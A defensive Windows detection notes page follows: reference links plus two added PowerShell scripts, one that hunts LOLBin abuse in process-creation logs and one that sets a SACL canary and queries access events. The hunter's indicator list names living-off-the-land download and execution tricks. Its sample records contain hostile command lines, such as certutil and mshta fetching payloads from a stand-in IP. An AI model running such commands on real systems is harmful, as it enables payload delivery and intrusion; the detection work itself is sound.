Windows Use Cases
Living Off The Land Binaries and Scripts (LOLBAS)
https://lolbas-project.github.io/
and why hunting for LOLBins is one of the best detection bets
https://nasbench.medium.com/why-hunting-for-lolbins-is-one-of-the-best-bets-e5e58e1619c2
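The LOLBAS catalogue and the hunting article above are references; the script below is an added example, not code from either of them. It scores process-creation records against a small, hand-picked set of LOLBins and the command-line fragments that rarely occur in legitimate use, and flags Office or web-server parents spawning them. The indicator lists, the parent list and the sample events are my own constructions; the 4688 property indexes in Get-ProcessCreationEvents are assumed to follow the Windows 10+ schema and should be checked against your event XML.

```powershell
# LOLBin hunting over process-creation records (added example, not LOLBAS code).
# Indicator lists below are a hand-picked assumption, not the full LOLBAS catalogue.
$LolbinIndicators = @{
    'certutil.exe'  = @('-urlcache', '-decode', '-encode', '-verifyctl')
    'mshta.exe'     = @('http', 'javascript:', 'vbscript:')
    'regsvr32.exe'  = @('/i:http', 'scrobj.dll', '/u /s /i:')
    'rundll32.exe'  = @('javascript:', 'url.dll', 'advpack.dll', 'ieadvpack.dll')
    'msiexec.exe'   = @('/i http', '/q http')
    'bitsadmin.exe' = @('/transfer', '/addfile')
    'wmic.exe'      = @('process call create', '/format:', '.xsl')
}

# Parents that seldom have a legitimate reason to spawn the binaries above (assumption).
$SuspiciousParents = @('winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe', 'w3wp.exe')

function Find-LolbinAbuse {
    # Takes objects with Time, Host, User, Image, CommandLine, ParentImage and
    # emits one finding per record that matches an indicator or a suspicious parent.
    param([Parameter(ValueFromPipeline)] [pscustomobject] $Event)
    process {
        $image  = [System.IO.Path]::GetFileName($Event.Image).ToLowerInvariant()
        if (-not $LolbinIndicators.ContainsKey($image)) { return }
        $cmd    = [string]$Event.CommandLine
        $hits   = @($LolbinIndicators[$image] | Where-Object { $cmd.ToLowerInvariant().Contains($_.ToLowerInvariant()) })
        $parent = [System.IO.Path]::GetFileName([string]$Event.ParentImage).ToLowerInvariant()
        $badParent = $SuspiciousParents -contains $parent
        if ($hits.Count -gt 0 -or $badParent) {
            [pscustomobject]@{
                Time             = $Event.Time
                Host             = $Event.Host
                User             = $Event.User
                Image            = $image
                Parent           = $parent
                Indicators       = ($hits -join ', ')
                SuspiciousParent = $badParent
                CommandLine      = $Event.CommandLine
            }
        }
    }
}

function Get-ProcessCreationEvents {
    # Pulls Security 4688 records. Requires "Audit Process Creation" plus the
    # "Include command line in process creation events" policy, or CommandLine is empty.
    # Property indexes are an assumption based on the Windows 10+ 4688 schema.
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $p = $_.Properties
            [pscustomobject]@{
                Time        = $_.TimeCreated
                Host        = $_.MachineName
                User        = $p[1].Value
                Image       = $p[5].Value
                CommandLine = $p[8].Value
                ParentImage = $p[13].Value
            }
        }
}

# Constructed sample records so the hunt runs offline; replace with Get-ProcessCreationEvents.
$Sample = @(
    [pscustomobject]@{ Time='2024-01-10 09:12:03'; Host='WS01'; User='alice'
        Image='C:\Windows\System32\certutil.exe'
        CommandLine='certutil.exe -urlcache -split -f http://198.51.100.7/p.txt C:\Users\Public\p.exe'
        ParentImage='C:\Windows\System32\cmd.exe' }
    [pscustomobject]@{ Time='2024-01-10 09:12:40'; Host='WS01'; User='alice'
        Image='C:\Windows\System32\rundll32.exe'
        CommandLine='rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL'
        ParentImage='C:\Windows\explorer.exe' }
    [pscustomobject]@{ Time='2024-01-10 09:13:15'; Host='WS02'; User='bob'
        Image='C:\Windows\System32\mshta.exe'
        CommandLine='mshta.exe http://198.51.100.7/a.hta'
        ParentImage='C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE' }
)

$Sample | Find-LolbinAbuse | Format-Table Time, Host, Image, Parent, Indicators, SuspiciousParent -AutoSize
```

Only the certutil and mshta records are reported; the rundll32 Control Panel launch from explorer.exe is a normal pattern and matches no indicator. Expect tuning: certutil -urlcache and msiexec against HTTP sources do appear in some software deployment tooling, so baseline by parent and user before alerting.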
The URLs a Windows endpoint connects to, and why
https://learn.microsoft.com/en-gb/windows/privacy/manage-windows-11-endpoints
https://learn.microsoft.com/en-gb/windows/privacy/manage-windows-21h2-endpoints
The abuse of MSRPC mapped to MITRE ATT&CK
https://github.com/jsecurity101/MSRPC-to-ATTACK
Finding Forensic Goodness In Obscure Windows Event Logs
https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3
Windows API calls commonly used by malware
Detecting Windows Endpoint Compromise with System Access Control Lists (SACLs)
https://medium.com/@cryps1s/detecting-windows-endpoint-compromise-with-sacls-cd748e10950
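The article above describes the approach; the script below is an added example of it, not code from the article or its author. It puts an audit ACE on a canary directory that nobody should read, enables the File System audit subcategory so the ACE actually produces events, and then queries Security 4663 for touches of that path. $CanaryPath is a hypothetical location, and the 4663 property indexes are an assumption based on the Windows 10+ event schema; run elevated, since reading and writing SACLs needs SeSecurityPrivilege.

```powershell
# SACL-based canary (added example, not the article's code). Run as Administrator.
$CanaryPath = 'C:\Finance\Payroll_2023_backup'   # hypothetical canary directory

# 1. An audit ACE is silent unless the matching audit subcategory is enabled.
auditpol /set /subcategory:"File System" /success:enable /failure:enable | Out-Null

# 2. Add an audit ACE: record every read/list/execute by anyone, inherited by children.
if (-not (Test-Path $CanaryPath)) { New-Item -ItemType Directory -Path $CanaryPath | Out-Null }
$acl  = Get-Acl -Path $CanaryPath -Audit
$rule = [System.Security.AccessControl.FileSystemAuditRule]::new(
    'Everyone',
    [System.Security.AccessControl.FileSystemRights]'ReadData, ReadAttributes, ExecuteFile',
    [System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit',
    [System.Security.AccessControl.PropagationFlags]::None,
    [System.Security.AccessControl.AuditFlags]'Success, Failure')
$acl.AddAuditRule($rule)
Set-Acl -Path $CanaryPath -AclObject $acl

function Get-CanaryAccess {
    # 4663 = "An attempt was made to access an object". Filters on ObjectName so
    # other audited objects on the host do not pollute the result.
    # Property indexes (1 user, 6 object, 8 access list, 11 process) are an assumption.
    param([string] $Path, [int] $Hours = 24)
    $filter = @{ LogName = 'Security'; Id = 4663; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { [string]$_.Properties[6].Value -like "$Path*" } |
        ForEach-Object {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                User    = $_.Properties[1].Value
                Process = $_.Properties[11].Value
                Object  = $_.Properties[6].Value
                Access  = ($_.Properties[8].Value -replace '\s+', ' ').Trim()
            }
        }
}

Get-CanaryAccess -Path $CanaryPath | Format-Table -AutoSize
```

Two caveats the article's approach depends on: the audit ACE fires only for access types listed in its rights mask, so a rule that audits ReadData will not log an attacker who only enumerates attributes, and a SACL on a busy path (profile directories, the SAM hive) generates volume that drowns the signal. Canary files and genuinely sensitive objects that legitimate processes never open are where the technique pays off.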